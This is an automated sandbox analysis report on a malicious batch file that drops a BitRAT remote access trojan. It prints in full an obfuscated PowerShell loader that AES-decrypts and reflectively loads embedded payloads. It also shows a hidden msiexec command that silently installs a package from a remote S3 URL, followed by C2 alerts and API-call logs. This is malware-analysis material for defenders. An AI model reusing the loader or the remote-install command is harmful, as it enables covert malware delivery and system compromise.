Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 11, 2023, 9:59 a.m.	July 11, 2023, 10:01 a.m.

Size	950.9KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`4986cda33d79aa6d6034cd666895dd09`
SHA256	`130b776fb282b7134c5fc74e5b656679c296563d40348ee558d2ca39cbdbeb06`
CRC32	`68471331`
ssdeep	`12288:Iew2re7txIPZxxrUVOhqLqNTQyJX8pby/tcblbPx+Tu7pnUShvCmLA0TSjBRaIhZ:K2r2txIRLyq2cMTAuRFLA46aIyQHAf2`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "vjZHYuYwki" C:\Users\test22\AppData\Local\Temp\rev.bat
2556
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\rev.bat
  2628
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\rev.bat
    2740
    - rev.bat.exe "C:\Users\test22\AppData\Local\Temp\rev.bat.exe" -w hidden -c $Rwyy='ReYnHaaYnHadLiYnHanesYnHa'.Replace('YnHa', '');$PmMk='TraYnHansYnHafoYnHarmYnHaFinaYnHalYnHaBlYnHaockYnHa'.Replace('YnHa', '');$MfYp='FirYnHastYnHa'.Replace('YnHa', '');$kVgj='FroYnHamYnHaBYnHaasYnHae6YnHa4StYnHariYnHangYnHa'.Replace('YnHa', '');$aHWr='ChYnHaanYnHageExYnHatenYnHasiYnHaonYnHa'.Replace('YnHa', '');$gqav='GYnHaetCYnHaurrYnHaenYnHatPrYnHaocesYnHasYnHa'.Replace('YnHa', '');$DHcv='SplYnHaitYnHa'.Replace('YnHa', '');$EEdg='EnYnHatYnHarYnHayYnHaPoYnHaintYnHa'.Replace('YnHa', '');$tcdy='MaYnHaiYnHanYnHaMoYnHaduleYnHa'.Replace('YnHa', '');$aFEC='IYnHanvYnHaokeYnHa'.Replace('YnHa', '');$XlVq='LoadYnHa'.Replace('YnHa', '');$jaIs='CYnHareaYnHateYnHaDecrYnHayYnHapYnHatorYnHa'.Replace('YnHa', '');function tWkWm($tIqHx){$gvkKA=[System.Security.Cryptography.Aes]::Create();$gvkKA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$gvkKA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$gvkKA.Key=[System.Convert]::$kVgj('M9sMpwxY1XjodXbV6oJ2kek50ehlInCYuwfh/CjlMzc=');$gvkKA.IV=[System.Convert]::$kVgj('EClXKP7rmyoRnUX3gynDag==');$BjrdS=$gvkKA.$jaIs();$MTfir=$BjrdS.$PmMk($tIqHx,0,$tIqHx.Length);$BjrdS.Dispose();$gvkKA.Dispose();$MTfir;}function voAuL($tIqHx){$WKDaM=New-Object System.IO.MemoryStream(,$tIqHx);$vEUKC=New-Object System.IO.MemoryStream;$TsvRU=New-Object System.IO.Compression.GZipStream($WKDaM,[IO.Compression.CompressionMode]::Decompress);$TsvRU.CopyTo($vEUKC);$TsvRU.Dispose();$WKDaM.Dispose();$vEUKC.Dispose();$vEUKC.ToArray();}$UYevX=[System.Linq.Enumerable]::$MfYp([System.IO.File]::$Rwyy([System.IO.Path]::$aHWr([System.Diagnostics.Process]::$gqav().$tcdy.FileName, $null)));$UFUei=$UYevX.Substring(3).$DHcv(':');$qRpdv=voAuL (tWkWm ([Convert]::$kVgj($UFUei[0])));$mLDah=voAuL (tWkWm ([Convert]::$kVgj($UFUei[1])));[System.Reflection.Assembly]::$XlVq([byte[]]$mLDah).$EEdg.$aFEC($null,$null);[System.Reflection.Assembly]::$XlVq([byte[]]$qRpdv).$EEdg.$aFEC($null,$null);
      2836
    - powershell.exe powershell -WindowStyle Hidden -Command "Start-Sleep -Seconds 20"
      2920
    - powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'msiexec.exe' -ArgumentList '/i', 'https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi', '/qn' -Wait -WindowStyle Hidden"
      2056
      - msiexec.exe "C:\Windows\system32\msiexec.exe" /i https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi /qn
        2108
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
fesad.s3.eu-north-1.amazonaws.com	CNAME s3-r-w.eu-north-1.amazonaws.com A 52.95.171.4	16.12.9.14

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.157.162.126	Active	Moloch
52.95.171.4	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49174 -> 52.95.171.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 185.157.162.126:443	906200095	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (BitRAT)	undefined
TCP 185.157.162.126:443 -> 192.168.56.101:49176	2030724	ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)	Domain Observed Used for C2 Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49174 52.95.171.4:443	C=US, O=Amazon, CN=Amazon RSA 2048 M01	CN=*.s3.eu-north-1.amazonaws.com	8e:bc:29:ca:40:d5:e9:65:60:42:17:f2:71:e5:3b:24:e1:b7:9a:41
TLS 1.2 192.168.56.101:49176 185.157.162.126:443	CN=BitRAT	CN=BitRAT	fb:e2:a7:63:31:a4:36:70:f5:2c:87:7b:ab:0b:4b:f8:e5:9c:9b:7a

Queries for the computername (14 events)

Time & API	Arguments	Status	Return
GetComputerNameA July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 11, 2023, 9:59 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 11, 2023, 9:59 a.m.			0	0
IsDebuggerPresent July 11, 2023, 9:59 a.m.			0	0
IsDebuggerPresent July 11, 2023, 9:59 a.m.			0	0

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: At line:1 char:950 console_handle: 0x0000002f	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: + $Rwyy='ReYnHaaYnHadLiYnHanesYnHa'.Replace('YnHa', '');$PmMk='TraYnHansYnHafoY console_handle: 0x0000003b	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: nHarmYnHaFinaYnHalYnHaBlYnHaockYnHa'.Replace('YnHa', '');$MfYp='FirYnHastYnHa'. console_handle: 0x00000047	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: Replace('YnHa', '');$kVgj='FroYnHamYnHaBYnHaasYnHae6YnHa4StYnHariYnHangYnHa'.Re console_handle: 0x00000053	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: place('YnHa', '');$aHWr='ChYnHaanYnHageExYnHatenYnHasiYnHaonYnHa'.Replace('YnHa console_handle: 0x0000005f	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: ', '');$gqav='GYnHaetCYnHaurrYnHaenYnHatPrYnHaocesYnHasYnHa'.Replace('YnHa', '' console_handle: 0x0000006b	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: );$DHcv='SplYnHaitYnHa'.Replace('YnHa', '');$EEdg='EnYnHatYnHarYnHayYnHaPoYnHai console_handle: 0x00000077	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: ntYnHa'.Replace('YnHa', '');$tcdy='MaYnHaiYnHanYnHaMoYnHaduleYnHa'.Replace('YnH console_handle: 0x00000083	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: a', '');$aFEC='IYnHanvYnHaokeYnHa'.Replace('YnHa', '');$XlVq='LoadYnHa'.Replace console_handle: 0x0000008f	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: ('YnHa', '');$jaIs='CYnHareaYnHateYnHaDecrYnHayYnHapYnHatorYnHa'.Replace('YnHa' console_handle: 0x0000009b	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: , '');function tWkWm($tIqHx){$gvkKA=[System.Security.Cryptography.Aes]::Create( console_handle: 0x000000a7	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: );$gvkKA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$gvkKA.Padding=[Sy console_handle: 0x000000b3	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: stem.Security.Cryptography.PaddingMode]::PKCS7;$gvkKA.Key=[System.Convert]::$kV console_handle: 0x000000bf	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: gj( <<<< 'M9sMpwxY1XjodXbV6oJ2kek50ehlInCYuwfh/CjlMzc=');$gvkKA.IV=[System.Conv console_handle: 0x000000cb	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: ert]::$kVgj('EClXKP7rmyoRnUX3gynDag==');$BjrdS=$gvkKA.$jaIs();$MTfir=$BjrdS.$Pm console_handle: 0x000000d7	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: Mk($tIqHx,0,$tIqHx.Length);$BjrdS.Dispose();$gvkKA.Dispose();$MTfir;}function v console_handle: 0x000000e3	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: oAuL($tIqHx){$WKDaM=New-Object System.IO.MemoryStream(,$tIqHx);$vEUKC=New-Objec console_handle: 0x000000ef	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: t System.IO.MemoryStream;$TsvRU=New-Object System.IO.Compression.GZipStream($WK console_handle: 0x000000fb	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: DaM,[IO.Compression.CompressionMode]::Decompress);$TsvRU.CopyTo($vEUKC);$TsvRU. console_handle: 0x00000107	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: Dispose();$WKDaM.Dispose();$vEUKC.Dispose();$vEUKC.ToArray();}$UYevX=[System.Li console_handle: 0x00000113	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: nq.Enumerable]::$MfYp([System.IO.File]::$Rwyy([System.IO.Path]::$aHWr([System.D console_handle: 0x0000011f	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: iagnostics.Process]::$gqav().$tcdy.FileName, $null)));$UFUei=$UYevX.Substring(3 console_handle: 0x0000012b	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: ).$DHcv(':');$qRpdv=voAuL (tWkWm ([Convert]::$kVgj($UFUei[0])));$mLDah=voAuL (t console_handle: 0x00000137	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: WkWm ([Convert]::$kVgj($UFUei[1])));[System.Reflection.Assembly]::$XlVq([byte[] console_handle: 0x00000143	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: ]$mLDah).$EEdg.$aFEC($null,$null);[System.Reflection.Assembly]::$XlVq([byte[]]$ console_handle: 0x0000014f	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: qRpdv).$EEdg.$aFEC($null,$null); console_handle: 0x0000015b	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x00000167	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: ecordException console_handle: 0x00000173	1	1
WriteConsoleW July 11, 2023, 9:59 a.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x0000017f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 124 events)

Time & API	Arguments	Status	Return
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c24e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c24e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c24e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c24e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c24e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c24e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c2128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb428 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb368 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb368 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb368 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eaa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 11, 2023, 9:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eaa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 11, 2023, 9:59 a.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET https://fesad.s3.eu-north-1.amazonaws.com/Apppdfread.msi

Allocates read-write-execute memory (usually to unpack itself) (50 out of 404 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02901000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02902000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 11, 2023, 9:59 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
